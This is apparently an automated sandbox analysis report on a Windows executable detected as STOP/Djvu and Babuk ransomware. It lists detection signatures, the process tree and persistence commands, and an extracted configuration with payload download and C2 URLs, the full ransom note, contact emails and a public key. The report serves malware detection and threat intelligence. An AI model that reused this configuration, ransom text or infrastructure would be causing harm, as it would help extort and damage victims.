Windows Analysis Report
tsnsd8pOvn.exe

Overview

General Information

Sample name:tsnsd8pOvn.exe
renamed because original name is a hash value
Original sample name:04e42207db45792cae0f6d3fd83f0680N.exe
Analysis ID:1499386
MD5:04e42207db45792cae0f6d3fd83f0680
SHA1:cb17f3a1bb57541204afd27313b390e5ead5096c
SHA256:b377b7b8211e454117ba3d6cd6bb1ac84c0105c8647187cb5cf19ad50c9d26b9
Tags:exe

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • tsnsd8pOvn.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 972 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" MD5: 04E42207DB45792CAE0F6D3FD83F0680)
      • icacls.exe (PID: 1524 cmdline: icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • tsnsd8pOvn.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask MD5: 04E42207DB45792CAE0F6D3FD83F0680)
        • tsnsd8pOvn.exe (PID: 416 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 6408 cmdline: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 1208 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 6956 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 1492 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • cleanup
Name: Babuk
Description: Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name: STOP, Djvu
Description: STOP Djvu Ransomware is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as a marker to the encrypted file's name. It does not encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

{"Download URLs": ["http://asvb.top/files/penelop/updatewin1.exe", "http://asvb.top/files/penelop/updatewin2.exe", "http://asvb.top/files/penelop/updatewin.exe", "http://asvb.top/files/penelop/3.exe", "http://asvb.top/files/penelop/4.exe", "http://asvb.top/files/penelop/5.exe"], "C2 url": "http://asvb.top/nddddhsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-TVrnNufMGq\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpteam@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@airmail.cc\r\n\r\nYour personal ID:\r\n0296Sirj", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", 
"C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmCjH4IH1RSzyZ4fA+Ywb\\\\njsJ0u\\/T6brAr00FwAQRglbWZDleNtXyI6mWiM5FdbU6PIoKv8KraOo004ZnKrheO\\\\nu1SIGq24NbUUFqsy+alkWsiO3g8lz4UmT2UKIZH9bk5JnaUCC2yd3ZANlfRCSr2q\\\\ncCLOUZL2JoJx\\/jgYFUm4p93A4CwU2yyfF3FmTkMurpyXKKDj71lpE3ZeHNvOUjuW\\\\n0PJUAAq\\/oHPB3WCywglI6YypFJ5I7fJda8q6\\/vQV\\/ddtdT5HQHcyhm9gNnen62HF\\\\ns650mkgzLjWSeb0AffgK8p9iDhcyF+xK0HMuV4tv5vDBj1wZ887dfeBLwuGrGsGi\\\\nSwIDAQAB\\\\n-----END PUBLIC KEY-----"}
Source | Rule | Description | Author | Strings
00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source | Rule | Description | Author | Strings
10.2.tsnsd8pOvn.exe.22515a0.1.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
10.2.tsnsd8pOvn.exe.22515a0.1.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown
  • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
  • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.tsnsd8pOvn.exe.22515a0.1.unpack | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen
  • 0xfd288:$x1: C:\SystemID\PersonalID.txt
  • 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
  • 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\
  • 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
  • 0xfd6ec:$s1: " --AutoStart
  • 0xfd700:$s1: " --AutoStart
  • 0x101348:$s2: --ForNetRes
  • 0x101310:$s3: --Admin
  • 0x101790:$s4: %username%
  • 0x1018b4:$s5: ?pid=
  • 0x1018c0:$s6: &first=true
  • 0x1018d8:$s6: &first=false
  • 0xfd7f4:$s7: delself.bat
  • 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
  • 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
  • 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.2.tsnsd8pOvn.exe.400000.0.raw.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
2.2.tsnsd8pOvn.exe.400000.0.raw.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown
  • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
  • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF

        System Summary

        Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\tsnsd8pOvn.exe, ProcessId: 972, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
        Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
        2024-08-26T23:32:41.298785+0200 | 2803274 | 2 | 52648 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:41.298785+0200 | 2018581 | 1 | 52648 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:32:41.298785+0200 | 2020826 | 1 | 52648 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:32:41.298785+0200 | 2036333 | 1 | 52648 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:32:03.640222+0200 | 2803274 | 2 | 52640 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:17.409857+0200 | 2803274 | 2 | 49716 | 443 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:58.064861+0200 | 2803274 | 2 | 52651 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:58.064861+0200 | 2833438 | 1 | 52651 | 80 | TCP | Malware Command and Control Activity Detected
        2024-08-26T23:31:15.144397+0200 | 2803274 | 2 | 49712 | 443 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:56.445703+0200 | 2803274 | 2 | 52650 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:56.445703+0200 | 2036334 | 1 | 52650 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:37.065347+0200 | 2803274 | 2 | 49714 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:33:02.658754+0200 | 2803274 | 2 | 52652 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:33:02.658754+0200 | 2018581 | 1 | 52652 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:33:02.658754+0200 | 2020826 | 1 | 52652 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:33:02.658754+0200 | 2036333 | 1 | 52652 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:38.858740+0200 | 2803274 | 2 | 49717 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:38.858740+0200 | 2833438 | 1 | 49717 | 80 | TCP | Malware Command and Control Activity Detected
        2024-08-26T23:31:34.643947+0200 | 2803274 | 2 | 52638 | 443 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:30.047078+0200 | 2803274 | 2 | 52645 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:58.536295+0200 | 2803274 | 2 | 52639 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:58.536295+0200 | 2020826 | 1 | 52639 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:58.536295+0200 | 2036333 | 1 | 52639 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:32:05.302518+0200 | 2803274 | 2 | 52641 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:05.302518+0200 | 2833438 | 1 | 52641 | 80 | TCP | Malware Command and Control Activity Detected
        2024-08-26T23:30:59.584547+0200 | 2803274 | 2 | 52654 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:30:59.584547+0200 | 2018581 | 1 | 52654 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:30:59.584547+0200 | 2020826 | 1 | 52654 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:30:59.584547+0200 | 2036333 | 1 | 52654 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:27.641342+0200 | 2803274 | 2 | 52636 | 443 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:31.658617+0200 | 2803274 | 2 | 52646 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:31.658617+0200 | 2833438 | 1 | 52646 | 80 | TCP | Malware Command and Control Activity Detected
        2024-08-26T23:32:19.926942+0200 | 2803274 | 2 | 52643 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:32:19.926942+0200 | 2020826 | 1 | 52643 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:32:19.926942+0200 | 2036333 | 1 | 52643 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:09.086681+0200 | 2803274 | 2 | 49711 | 443 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:37.061694+0200 | 2803274 | 2 | 49713 | 80 | TCP | Potentially Bad Traffic
        2024-08-26T23:31:37.061694+0200 | 2020826 | 1 | 49713 | 80 | TCP | A Network Trojan was detected
        2024-08-26T23:31:37.061694+0200 | 2036333 | 1 | 49713 | 80 | TCP | A Network Trojan was detected

        AV Detection

        Source: tsnsd8pOvn.exe | Avira: detected
        Source: https://autodiscover.uk/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.in/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.it/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.fr/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.xyz/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.com.br/autodiscover/autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.sg/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: https://autodiscover.es/Autodiscover/Autodiscover.xml | Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | Avira: detection malicious, Label: HEUR/AGEN.1316832
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Djvu
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | ReversingLabs: Detection: 86%
        Source: tsnsd8pOvn.exe | ReversingLabs: Detection: 86%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | Joe Sandbox ML: detected
        Source: tsnsd8pOvn.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Code function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
        Source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_54fcdbf9-4

        Compliance

        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Unpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | Unpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | Unpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | Unpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | Unpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: tsnsd8pOvn.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | File created: C:\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | File created: C:\$WinREAgent\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | File created: C:\$WinREAgent\Scratch\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe | File created: C:\Users\user\_readme.txt
        Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52636 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52638 version: TLS 1.2
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: tsnsd8pOvn.exe, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: 785491~1.PCQntkrnlmp.pdb5 source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\mpS source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: &5(C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb.pdbX source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\E source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: tsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\2 source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*] source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Micros source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wct425E.tmp.7.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ggZ source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp

        Spreading

        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
